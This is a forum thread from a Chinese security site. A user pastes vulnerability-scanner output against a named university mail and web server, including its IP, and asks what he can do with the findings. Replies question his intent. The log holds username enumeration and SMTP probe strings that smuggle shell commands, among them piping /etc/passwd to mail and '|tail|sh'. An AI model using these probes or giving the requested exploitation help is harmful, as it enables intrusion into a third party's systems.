|
![]() | 作者: jimmyliu [jimmyliu]
![]() |
登录 |
想问各位。知道下面的漏洞我能做些什么呢。。 能告诉我吗。谢谢了。。 描目标主机开放的端口: 21号端口(ftp)开放! 25号端口(smtp)开放! 53号端口(domain)开放! 80号端口(未知)开放! 110号端口(pop3)开放! 135号端口(未知)开放! 443号端口(未知)开放! 1025号端口(未知)开放! 1026号端口(未知)开放! 6000号端口(未知)开放! 开始扫描FTP漏洞: FTP服务器的Banner: 220 server3 Microsoft FTP Service (Version 5.0). 测试匿名用户 530 User anonymous cannot log in. 根目录列表: 530 Please login with USER and PASS. 尝试改变主目录属性为可写: 530 Please login with USER and PASS. 尝试建立目录: 530 Please login with USER and PASS. 尝试执行Shell: 530 Please login with USER and PASS. 开始扫描SMTP漏洞: SMTP服务器的Banner: 220 <1059035150.2504@web.sdplmci.edu.cn> [LWMail 6.50 (Win32/Ix86) ESMTP Server] service ready; Thu, 24 Jul 2003 16:25:50 +0800 250-HELO EHLO MAIL RCPT DATA AUTH 250-RSET VRFY ETRN NOOP HELP QUIT 250 For more informations please visit : wait4u@163.net 可以使用RCPT命令获得用户名列表. 可以使用VRFY命令获得用户名列表. 501 Syntax error in parameters or arguments 503 Bad sequence of commands 尝试利用RCPT命令获得目标机上存在的一些常见用户名: root test www web sybase oracle informix guest sam_exec + oracle8 access user ftp account backup owc datebase public info wais news bbs adm sync john sports china 检查decode别名: 501 Command not accepted 500 Syntax error, command unrecognized 检查漏洞 500 Syntax error, command unrecognized 检查debug漏洞 500 Syntax error, command unrecognized 检查kill漏洞 500 Syntax error, command unrecognized 检查wiz漏洞 500 Syntax error, command unrecognized 检查rcpt to: /tmp/.rhosts漏洞 503 Bad sequence of commands 检查+ +漏洞 500 Syntax error, command unrecognized 检查RSET漏洞 250 OK 检查mail from: |/bin/mail hacker < /etc/passwd漏洞 503 Bad sequence of commands 检查RSET漏洞 250 OK 检查mail from: |tail|sh漏洞 503 Bad sequence of commands 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://211.64.8.3/index.html Date: Thu, 24 Jul 2003 08:27:10 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 25 Jun 2003 01:19:06 GMT ETag: "d0b35ec5b73ac31:926" Content-Length: 28532 开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 发现/_vti_inf.html漏洞 发现/cgi-bin/imagemap.exe漏洞 开始扫描IIS漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://211.64.8.3/index.html Date: Thu, 24 Jul 2003 08:29:06 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 25 Jun 2003 01:19:06 GMT ETag: "d0b35ec5b73ac31:926" Content-Length: 28532 开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 开始扫描RPC漏洞: 目标没有开放RPC查询服务... 说明:扫描NTUSER漏洞:------此功能基于NT/2K以上版本的系统 说明:查询SHARES:------此功能基于NT/2K以上版本的系统 说明:查询USERS:------此功能基于NT/2K以上版本的系统 说明:查询GROUPS:------此功能基于NT/2K以上版本的系统 说明:查询TRANSPORTS:------此功能基于NT/2K以上版本的系统 说明:查询DATETIME:------此功能基于NT/2K以上版本的系统 说明:查询SERVICES:------此功能基于NT/2K以上版本的系统 说明:查询SESSIONS:------此功能基于NT/2K以上版本的系统 说明:查询REGISTRY:------此功能基于NT/2K以上版本的系统 说明:查询MORE:------此功能基于NT/2K以上版本的系统 |
地主 发表时间: 09/15 20:04 |
![]() | 回复: ceo_8008 [ceo_8008] ![]() |
登录 |
你想干什么? |
B1层 发表时间: 09/15 22:15 |
![]() | 回复: Greentea [napolun] ![]() |
登录 |
这个帖子快被转了。 |
B2层 发表时间: 09/15 22:46 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号